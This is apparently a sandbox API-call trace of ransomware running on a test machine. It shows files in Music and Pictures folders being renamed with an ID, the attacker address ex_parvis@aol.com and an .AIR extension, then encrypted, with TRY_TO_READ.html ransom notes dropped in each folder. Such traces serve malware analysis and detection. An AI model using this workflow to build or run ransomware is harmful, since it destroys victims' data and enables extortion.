	[0106.794] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\oaqndsis 8jo.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\oaqndsis 8jo.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.799] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\Oaqndsis 8JO.mp3.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\oaqndsis 8jo.mp3.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544
	[0106.799] GetProcessHeap () returned 0x540000
	[0106.799] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.799] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=28834) returned 1
	[0106.799] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x70a2
	[0106.799] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.799] GetProcessHeap () returned 0x540000
	[0106.799] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.799] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.801] WriteFile (in: hFile=0x544, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.802] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.802] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.802] ReadFile (in: hFile=0x544, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x70a2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x70a2, lpOverlapped=0x0) returned 1
	[0106.803] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.803] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.803] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav", dwFileAttributes=0x80) returned 1
	[0106.803] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav") returned 68
	[0106.803] GetProcessHeap () returned 0x540000
	[0106.803] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xee) returned 0x57fb28
	[0106.803] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav"
	[0106.804] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.804] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\3dpapiomcwdhkf.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\3dpapiomcwdhkf.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.806] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\3DpaPiomCWDhkF.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\3dpapiomcwdhkf.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544
	[0106.807] GetProcessHeap () returned 0x540000
	[0106.807] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.807] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=76063) returned 1
	[0106.807] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1291f
	[0106.807] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.807] GetProcessHeap () returned 0x540000
	[0106.807] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.807] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.807] WriteFile (in: hFile=0x544, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.808] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.808] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.809] ReadFile (in: hFile=0x544, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x1291f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x1291f, lpOverlapped=0x0) returned 1
	[0106.810] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.810] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.810] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a", dwFileAttributes=0x80) returned 1
	[0106.810] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a") returned 60
	[0106.811] GetProcessHeap () returned 0x540000
	[0106.811] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x601bd0
	[0106.811] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a"
	[0106.811] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.811] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\-dyvd9.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\-dyvd9.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.813] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzAcAI-TDvu1\\-DYVd9.m4a.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vzacai-tdvu1\\-dyvd9.m4a.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544
	[0106.813] GetProcessHeap () returned 0x540000
	[0106.813] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0106.813] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=55909) returned 1
	[0106.813] SetFilePointer (in: hFile=0x544, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xda65
	[0106.814] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.814] GetProcessHeap () returned 0x540000
	[0106.814] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.814] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.815] WriteFile (in: hFile=0x544, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.817] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.817] WriteFile (in: hFile=0x544, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.817] ReadFile (in: hFile=0x544, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xda65, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xda65, lpOverlapped=0x0) returned 1
	[0106.819] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba6d8b0, ftCreationTime.dwHighDateTime=0x1d4ceec, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0060
	[0106.819] FindNextFileW (in: hFindFile=0x37b0060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba6d8b0, ftCreationTime.dwHighDateTime=0x1d4ceec, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.819] FindNextFileW (in: hFindFile=0x37b0060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343bc1d0, ftCreationTime.dwHighDateTime=0x1d4c7b0, ftLastAccessTime.dwLowDateTime=0x6ff84950, ftLastAccessTime.dwHighDateTime=0x1d4cdbe, ftLastWriteTime.dwLowDateTime=0x6ff84950, ftLastWriteTime.dwHighDateTime=0x1d4cdbe, nFileSizeHigh=0x0, nFileSizeLow=0x1195f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gotn.bmp", cAlternateFileName="")) returned 1
	[0106.819] FindNextFileW (in: hFindFile=0x37b0060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6592490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.819] FindNextFileW (in: hFindFile=0x37b0060, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6592490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0106.819] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.819] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.819] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp", dwFileAttributes=0x80) returned 1
	[0106.820] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp") returned 55
	[0106.820] GetProcessHeap () returned 0x540000
	[0106.820] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x605bd0
	[0106.820] lstrcpyW (in: lpString1=0x605bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp"
	[0106.820] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.820] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ez_slv\\gotn.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ez_slv\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.822] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ez_slv\\gotn.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548
	[0106.822] GetProcessHeap () returned 0x540000
	[0106.822] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x605bd0 | out: hHeap=0x540000) returned 1
	[0106.822] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=72031) returned 1
	[0106.822] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1195f
	[0106.822] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.822] GetProcessHeap () returned 0x540000
	[0106.822] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.822] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.824] WriteFile (in: hFile=0x548, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.825] WriteFile (in: hFile=0x548, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.825] WriteFile (in: hFile=0x548, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.826] ReadFile (in: hFile=0x548, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x1195f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x1195f, lpOverlapped=0x0) returned 1
	[0106.828] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4181e180, ftCreationTime.dwHighDateTime=0x1d4d3d6, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b00a0
	[0106.828] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4181e180, ftCreationTime.dwHighDateTime=0x1d4d3d6, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6592490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.828] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ffa9fa0, ftCreationTime.dwHighDateTime=0x1d4d4b0, ftLastAccessTime.dwLowDateTime=0x5e46ec0, ftLastAccessTime.dwHighDateTime=0x1d4d0bd, ftLastWriteTime.dwLowDateTime=0x5e46ec0, ftLastWriteTime.dwHighDateTime=0x1d4d0bd, nFileSizeHigh=0x0, nFileSizeLow=0x1469d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-8FGbU3mFsxg.bmp", cAlternateFileName="-8FGBU~1.BMP")) returned 1
	[0106.828] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe658d720, ftCreationTime.dwHighDateTime=0x1d4d1fd, ftLastAccessTime.dwLowDateTime=0x7629a990, ftLastAccessTime.dwHighDateTime=0x1d4d449, ftLastWriteTime.dwLowDateTime=0x7629a990, ftLastWriteTime.dwHighDateTime=0x1d4d449, nFileSizeHigh=0x0, nFileSizeLow=0xba7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2yOEkvU1I.jpg", cAlternateFileName="2YOEKV~1.JPG")) returned 1
	[0106.828] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe575f50, ftCreationTime.dwHighDateTime=0x1d4c90a, ftLastAccessTime.dwLowDateTime=0x2d187430, ftLastAccessTime.dwHighDateTime=0x1d4caac, ftLastWriteTime.dwLowDateTime=0x2d187430, ftLastWriteTime.dwHighDateTime=0x1d4caac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F7t1Nh", cAlternateFileName="")) returned 1
	[0106.828] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\F7t1Nh\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\f7t1nh\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.829] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cbf7f00, ftCreationTime.dwHighDateTime=0x1d4cf64, ftLastAccessTime.dwLowDateTime=0x40907960, ftLastAccessTime.dwHighDateTime=0x1d4d225, ftLastWriteTime.dwLowDateTime=0x40907960, ftLastWriteTime.dwHighDateTime=0x1d4d225, nFileSizeHigh=0x0, nFileSizeLow=0xbdc6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FYC7HTQ8JXQ_Yz.jpg", cAlternateFileName="FYC7HT~1.JPG")) returned 1
	[0106.829] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15cf3590, ftCreationTime.dwHighDateTime=0x1d4c60e, ftLastAccessTime.dwLowDateTime=0x7ade1430, ftLastAccessTime.dwHighDateTime=0x1d4d4e9, ftLastWriteTime.dwLowDateTime=0x7ade1430, ftLastWriteTime.dwHighDateTime=0x1d4d4e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mz6sdNad3NiwSUPkR", cAlternateFileName="MZ6SDN~1")) returned 1
	[0106.830] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\mz6sdNad3NiwSUPkR\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\mz6sdnad3niwsupkr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c
	[0106.831] FindNextFileW (in: hFindFile=0x37b00a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6592490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6592490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
